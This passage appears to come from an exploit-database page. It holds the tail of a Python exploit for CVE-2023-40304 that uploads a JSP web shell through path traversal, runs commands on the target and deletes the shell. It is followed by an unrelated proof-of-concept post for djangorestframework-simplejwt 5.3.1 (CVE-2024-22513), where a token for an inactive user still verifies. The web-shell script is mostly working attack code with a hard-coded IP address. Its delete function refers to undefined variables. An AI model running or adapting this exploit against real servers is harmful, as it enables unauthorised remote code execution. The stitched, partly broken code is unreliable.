requests.get(f"{url}/istrobe/jsp/userhelp/ws.jsp", verify=False) if r.status_code != 404: return r = requests.post(f"{url}/istrobe/userHelp/saveUserHelp", data=data, verify=False) if r.status_code == 200: print(f"[+] Successfully uploaded web shell, it should be accessible at {url}/istrobe/jsp/userhelp/ws.jsp") else: sys.exit("[-] Something went wrong while uploading the web shell") def delete_web_shell(url): paramsPost = {"fileName":"../jsp/userhelp/ws.jsp","author":"Guest","name":"test","action":"delete","lang":"en","type":"MODULE","status":"PUB"} response = session.post("http://220.4.147.38:6301/istrobe/userHelp/deleteUserHelp", data=paramsPost, headers=headers, cookies=cookies) if r.status_code == 200: print(f"[+] Successfully deleted web shell") else: sys.exit("[-] Something went wrong while deleting the web shell") def run_cmd(url, cmd): data = f"cmd={cmd}" r = requests.post(f"{url}/istrobe/jsp/userhelp/ws.jsp", data=data, verify=False) if r.status_code == 200: print(r.text) else: sys.exit(f'[-] Something went wrong while executing "{cmd}" command') parser = argparse.ArgumentParser(prog='exploit_cve_2023_40304.py', description='CVE-2023-40304 - Pre-auth file upload vulnerability + path traversal to achieve RCE') parser.add_argument('url', help='Vulnerable URL to target. Must be like http(s)://vuln.target') parser.add_argument('-c', '--cmd', help='Command to execute on the remote host (Defaults to "whoami")', default='whoami') parser.add_argument('--rm', help='Deletes the uploaded web shell', action='store_true') args = parser.parse_args() upload_web_shell(args.url) run_cmd(args.url, args.cmd) if args.rm: delete_web_shell(args.url)
HireHackking

djangorestframework-simplejwt 5.3.1 - Information Disclosure

HACKER · %s · %s

# Exploit Title: djangorestframework-simplejwt 5.3.1 - Information Disclosure # Date: 26/01/2024 # Exploit Author: Dhrumil Mistry (dmdhrumilmistry) # Vendor Homepage: https://github.com/jazzband/djangorestframework-simplejwt/ # Software Link:https://github.com/jazzband/djangorestframework-simplejwt/releases/tag/v5.3.1 # Version: <= 5.3.1 # Tested on: MacOS # CVE : CVE-2024-22513 # The version of djangorestframework-simplejwt up to 5.3.1 is vulnerable. # This vulnerability has the potential to cause various security issues, # including Business Object Level Authorization (BOLA), Business Function # Level Authorization (BFLA), Information Disclosure, etc. The vulnerability # arises from the fact that a user can access web application resources even # after their account has been disabled, primarily due to the absence of proper # user validation checks. # If a programmer generates a JWT token for an inactive user using `AccessToken` # class and `for_user` method then a JWT token is returned which can be used for # authentication across the django and django rest framework application. # Start Django Shell using below command: # python manage.py shell # ---------------------------------------- # Create inactive user and generate token for the user from django.contrib.auth.models import User from rest_framework_simplejwt.tokens import AccessToken # create inactive user inactive_user_id = User.objects.create_user('testuser', 'test@example.com', 'testPassw0rd!', is_active=False).id # django application programmer generates token for the inactive user AccessToken.for_user(User.objects.get(id=inactive_user_id)) # error should be raised since user is inactive # django application verifying user token AccessToken.for_user(User.objects.get(id=inactive_user_id)).verify() # no exception is raised during verification of inactive user token